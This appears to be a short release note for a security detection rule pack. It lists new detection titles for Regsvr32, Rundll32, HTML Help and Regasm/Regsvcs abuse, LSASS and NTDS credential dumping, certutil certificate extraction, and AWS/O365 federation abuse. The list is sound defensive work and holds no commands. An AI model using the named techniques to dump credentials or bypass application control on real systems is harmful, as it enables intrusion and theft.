New Stories
- Cloud Federated Credential Abuse
- Suspicious Regsvr32 Activity
- Suspicious Rundll32 Activity
- Suspicious Compiled HTML Activity
- Suspicious Regsvcs Regasm Activity
- Cobalt Strike
New Detections
- Detect HTML Help URL in Command Line
- Detect HTML Help Spawn Child Process
- Detect HTML Help Renamed
- Detect HTML Help Using InfoTech Storage Handlers
- Detect Regasm Spawning a Child Process
- Detect Regsvcs Spawning a Child Process
- Detect Regsvcs With Network Connection
- Detect Regasm with no Command Line Arguments
- Detect Regasm With Network Connection
- Detect regsvcs with no Command Line Arguments
- Detect Regsvr32 Application Control Bypass
- Suspicious regsvr32 register suspicious path
- Ntdsutil Export NTDS
- Dump lsass via procdump
- Dump lsass via procdump rename
- Creation of lsass dump with taskmgr
- Suspicious rundll32 rename
- Detect Rundll32 Application Control Bypass - advpack & ieadvpack
- Detect Rundll32 Application Control Bypass - syssetup
- Detect Rundll32 Application Control Bypass - setupapi
- Suspicious Rundll32 StartW
- Suspicious Rundll32 DllRegisterServer
- Suspicious Rundll32 with no command line arguments
- Certutil exe certification extraction
- AWS SAML access by provider user and principal
- AWS SAML update identity provider
- O365 Excessive SSO logon errors
- O365 added service principal
- O365 new federated domain added